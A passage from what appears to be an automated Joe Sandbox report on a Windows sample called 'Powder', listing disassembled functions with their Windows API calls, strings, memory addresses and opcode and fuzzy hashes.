                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$MoveWindow
                                                  • String ID: Listbox
                                                  • API String ID: 3315199576-2633736733
                                                  • Opcode ID: 8366bf0ae6714fc2491446fecff5b2258f9b038971f3130535821bdd02a8aa1c
                                                  • Instruction ID: a5efb9467abc1c9d10e7772f86226a25b9ebcc69c1a4c4a78a328a996971d90a
                                                  • Opcode Fuzzy Hash: 8366bf0ae6714fc2491446fecff5b2258f9b038971f3130535821bdd02a8aa1c
                                                  • Instruction Fuzzy Hash: 0721F532204118BFDF119F55CC45EFF37AAEB89754F109125FD48AB190C671DC519BA0
                                                  APIs
                                                    • Part of subcall function 00E3B544: _memset.LIBCMT ref: 00E3B551
                                                    • Part of subcall function 00E20B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E3B520,?,?,?,00E0100A), ref: 00E20B79
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00E0100A), ref: 00E3B524
                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E0100A), ref: 00E3B533
                                                  Strings
                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E3B52E
                                                  • =, xrefs: 00E3B514
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=
                                                  • API String ID: 3158253471-1801005180
                                                  • Opcode ID: 14124a56fc51dcb296c0c641ac6c48e1293fc75daa2e2d0fd11726bdca066bf6
                                                  • Instruction ID: 31ca851b63c800e0907e90c9ac9b50f4ea37d093028d84b5811d27ef4f5a67a9
                                                  • Opcode Fuzzy Hash: 14124a56fc51dcb296c0c641ac6c48e1293fc75daa2e2d0fd11726bdca066bf6
                                                  • Instruction Fuzzy Hash: 38E06DB02003118FD3209F3AE409B02BEE0AF04304F10991EE486EA351DBB5E548CB91
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00E4027A,?), ref: 00E7C6E7
                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E7C6F9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                  • API String ID: 2574300362-1816364905
                                                  • Opcode ID: f624999e5561326feac15232f97648f0d8736f2f927a184dd8bed2397c8324c5
                                                  • Instruction ID: 0f79ba5176f0d98328388dec198f672f99c4150b2e8a0383f0afe8020f3ed99c
                                                  • Opcode Fuzzy Hash: f624999e5561326feac15232f97648f0d8736f2f927a184dd8bed2397c8324c5
                                                  • Instruction Fuzzy Hash: E9E0C2386103028FD7204B3AEC49A5276D8FF04308BA0E42FE899F2210DB70C880CF10
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00E14AF7,?), ref: 00E14BB8
                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E14BCA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-1355242751
                                                  • Opcode ID: 131e45c9d85645a8a9a23a92d2bb6866ecb95a24b4b3eabcd12cd46643e59a8d
                                                  • Instruction ID: 9647764e9c00fbe5c3f53e53b278a48f221fd3f65c69aecf70e993d2fc854b17
                                                  • Opcode Fuzzy Hash: 131e45c9d85645a8a9a23a92d2bb6866ecb95a24b4b3eabcd12cd46643e59a8d
                                                  • Instruction Fuzzy Hash: C5D017B05167129FD720AF32EC08B8776E5AF44359B51AC6BD4D6F6AA4EA70D8C0CA10
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00E14B44,?,00E149D4,?,?,00E127AF,?,00000001), ref: 00E14B85
                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E14B97
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-3689287502
                                                  • Opcode ID: 2720076f2ddd964cee7d864119cb9f56f65371cce122a84cac4b9beae5115796
                                                  • Instruction ID: a2b8394c1e0d9988872952f1e187969ce6bf8f068535ab236413a0c31a38784f
                                                  • Opcode Fuzzy Hash: 2720076f2ddd964cee7d864119cb9f56f65371cce122a84cac4b9beae5115796
                                                  • Instruction Fuzzy Hash: 38D017B05147129FD7209F32EC18B8676E4AF44355FA1A82BD4D6F26A0E670E8C0CA14
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00E81696), ref: 00E81455
                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E81467
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                  • API String ID: 2574300362-4033151799
                                                  • Opcode ID: 3d7bdb6086bbb811d8965f3adc12c7e8e9ce2c4ff792bba4db81ce7205117fca
                                                  • Instruction ID: 08e6c057af93f13c1ec75cf041d56bfaf1c06c52f076847e645c0ea03b6538d2
                                                  • Opcode Fuzzy Hash: 3d7bdb6086bbb811d8965f3adc12c7e8e9ce2c4ff792bba4db81ce7205117fca
                                                  • Instruction Fuzzy Hash: 60D017305127139FD720AF76D80864776E8AF06399F21DC6B94EAF2160EA70D8C0CB20
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00E15E3D), ref: 00E155FE
                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E15610
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                  • API String ID: 2574300362-192647395
                                                  • Opcode ID: d69887d845c50365957d209f691d22d4a1fc9488911ee7f12e3a49a6d377d715
                                                  • Instruction ID: 4dc69ac6d76ebb2e939765c3d1e18ea6a006709d113b209adf575b40f2da5e80
                                                  • Opcode Fuzzy Hash: d69887d845c50365957d209f691d22d4a1fc9488911ee7f12e3a49a6d377d715
                                                  • Instruction Fuzzy Hash: 88D01275511712DFD7205F32D84865676D4AF84355B91982BD495F2151D770C4C0C690
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E793DE,?,00E90980), ref: 00E797D8
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E797EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                  • API String ID: 2574300362-199464113
                                                  • Opcode ID: 28d5da33adaf974e2db8fce71482f351454422a5aef75050567e1b114eb187eb
                                                  • Instruction ID: 480ea0f1520099390ff376e366d9b56c48dab1e94beb13656b8bd4c1994ba59d
                                                  • Opcode Fuzzy Hash: 28d5da33adaf974e2db8fce71482f351454422a5aef75050567e1b114eb187eb
                                                  • Instruction Fuzzy Hash: 88D017705207139FD7209F32E888646B6E5AF48395B51E82BD49AF2160EBB0C880CA11
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5be552da420a3cc11866f7ab7bcc4b8a0561e1cd0687b6d0b516e7d173d88c90
                                                  • Instruction ID: abd009d6c982df89efaef6e6f9c721d96782f4fcc2a82db7c81643bee0566a04
                                                  • Opcode Fuzzy Hash: 5be552da420a3cc11866f7ab7bcc4b8a0561e1cd0687b6d0b516e7d173d88c90
                                                  • Instruction Fuzzy Hash: CEC17C74A00216EFDB14CF98C984EAEB7B5FF48705B109998E845FB251DB31ED85CBA0
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?), ref: 00E7E7A7
                                                  • CharLowerBuffW.USER32(?,?), ref: 00E7E7EA
                                                    • Part of subcall function 00E7DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E7DEAE
                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E7E9EA
                                                  • _memmove.LIBCMT ref: 00E7E9FD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                  • String ID:
                                                  • API String ID: 3659485706-0
                                                  • Opcode ID: c952d04a328256c03d37009a13858821412e658fe65aad9210426c7a273887ca
                                                  • Instruction ID: e106f8dca7357138bcf676a722cd1ae121c04181e995c91d59d415b8a576401a
                                                  • Opcode Fuzzy Hash: c952d04a328256c03d37009a13858821412e658fe65aad9210426c7a273887ca
                                                  • Instruction Fuzzy Hash: A1C17C71608301CFC714DF28C48096ABBE4FF89718F1499AEF999AB351D731E946CB82
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00E787AD
                                                  • CoUninitialize.OLE32 ref: 00E787B8
                                                    • Part of subcall function 00E8DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00E78A0E,?,00000000), ref: 00E8DF71
                                                  • VariantInit.OLEAUT32(?), ref: 00E787C3
                                                  • VariantClear.OLEAUT32(?), ref: 00E78A94
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                  • String ID:
                                                  • API String ID: 780911581-0
                                                  • Opcode ID: 70272c61b2c8e30caac4bddc3157b3996a69b8df917bf0c7b05dcb552614bdb0
                                                  • Instruction ID: 7acea88ff4cb1d7833b147ac5ab5377270f96732c5bc30602cdf7294ebb27b1a
                                                  • Opcode Fuzzy Hash: 70272c61b2c8e30caac4bddc3157b3996a69b8df917bf0c7b05dcb552614bdb0
                                                  • Instruction Fuzzy Hash: 6AA18BB5244B019FD700DF24C585B2AB7E4BF98314F149849FA99AB3E2CB30ED41CB92
                                                  APIs
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E93C4C,?), ref: 00E58308
                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E93C4C,?), ref: 00E58320
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00E90988,000000FF,?,00000000,00000800,00000000,?,00E93C4C,?), ref: 00E58345
                                                  • _memcmp.LIBCMT ref: 00E58366
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: FromProg$FreeTask_memcmp
                                                  • String ID:
                                                  • API String ID: 314563124-0
                                                  • Opcode ID: 4c0fbe96214af31a48f1e9b55a23ee76db512a633c0da44bd965774ae4332aae
                                                  • Instruction ID: 273cfabad79751f53ccde7649a9ed915b1328ee0ef072cfbb834919fab78b687
                                                  • Opcode Fuzzy Hash: 4c0fbe96214af31a48f1e9b55a23ee76db512a633c0da44bd965774ae4332aae
                                                  • Instruction Fuzzy Hash: C7812C75A00109EFCB04DF94C984EEEB7B9FF89315F104559E905BB250DB71AE09CB60
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Variant$AllocClearCopyInitString
                                                  • String ID:
                                                  • API String ID: 2808897238-0
                                                  • Opcode ID: 0ea5948dfa199799d0e015d4abdcbe9a18cd9d5035412d9de063be5eb6d4dc9b
                                                  • Instruction ID: 3f9e9dd6f135c50143bca0c86b836bd09bbd073d00180d2637a1cf569bcacb78
                                                  • Opcode Fuzzy Hash: 0ea5948dfa199799d0e015d4abdcbe9a18cd9d5035412d9de063be5eb6d4dc9b
                                                  • Instruction Fuzzy Hash: 9051FC306087019FD7209F79E855A6DB3E8AF44315B20BC1FE9D6F72D2EB7088988B11
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00E7F526
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00E7F534
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00E7F5F4
                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E7F603
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                  • String ID:
                                                  • API String ID: 2576544623-0
                                                  • Opcode ID: 39645b0a7f9e0eecbf643c6ebd99cfe5e6d6a96848032b17c6a92c60253f7f20
                                                  • Instruction ID: 822f6fd605a78297ee8ba68380053014260d63189200dc8e16930b50396222a2
                                                  • Opcode Fuzzy Hash: 39645b0a7f9e0eecbf643c6ebd99cfe5e6d6a96848032b17c6a92c60253f7f20
                                                  • Instruction Fuzzy Hash: 16518FB11043119FD310EF20DC81EABB7E8EF94700F50592DF595A72A1EB709948CB92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                  • String ID:
                                                  • API String ID: 2782032738-0
                                                  • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                  • Instruction ID: 163f35cc74143bf9ed4b7d779e8a29fe6c36027e0a8d9a5fc58a220196b62d57
                                                  • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                  • Instruction Fuzzy Hash: C541DBF170072A9BDF29CF69E8809AF77A5AF80354B24913DE455E76C0E771DD808B44
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00E5A68A
                                                  • __itow.LIBCMT ref: 00E5A6BB
                                                    • Part of subcall function 00E5A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00E5A976
                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00E5A724
                                                  • __itow.LIBCMT ref: 00E5A77B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$__itow
                                                  • String ID:
                                                  • API String ID: 3379773720-0
                                                  • Opcode ID: 8b9d2addc0de7f5e767c579916ce31d55b64c71cc7ee571217efc96e376ab857
                                                  • Instruction ID: 744f1a64165251b3968118e0ad3934fcaace29e9057365f209c4a50e0a1ce01c
                                                  • Opcode Fuzzy Hash: 8b9d2addc0de7f5e767c579916ce31d55b64c71cc7ee571217efc96e376ab857
                                                  • Instruction Fuzzy Hash: AE418474A00209AFDF11DF54C845BEE7BF9EF48755F04146AFD05B3291DB709988CAA2
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00E770BC
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00E770CC
                                                    • Part of subcall function 00E04D37: __itow.LIBCMT ref: 00E04D62
                                                    • Part of subcall function 00E04D37: __swprintf.LIBCMT ref: 00E04DAC
                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E77130
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00E7713C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                  • String ID:
                                                  • API String ID: 2214342067-0
                                                  • Opcode ID: 18f1953358193e50186cfcb9998662256f574d66b1fb50c32088f9f147e5751c
                                                  • Instruction ID: fe790cf8417b5d27f984e17254d2d948366a0bebd00b3d2ffae91cd91b7311b6
                                                  • Opcode Fuzzy Hash: 18f1953358193e50186cfcb9998662256f574d66b1fb50c32088f9f147e5751c
                                                  • Instruction Fuzzy Hash: 4F41ADF1740200AFEB20AF24DD86F6A77E8AF04B14F549459FA59BB3D2DA709D408B91
                                                  APIs
                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00E90980), ref: 00E76B92
                                                  • _strlen.LIBCMT ref: 00E76BC4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
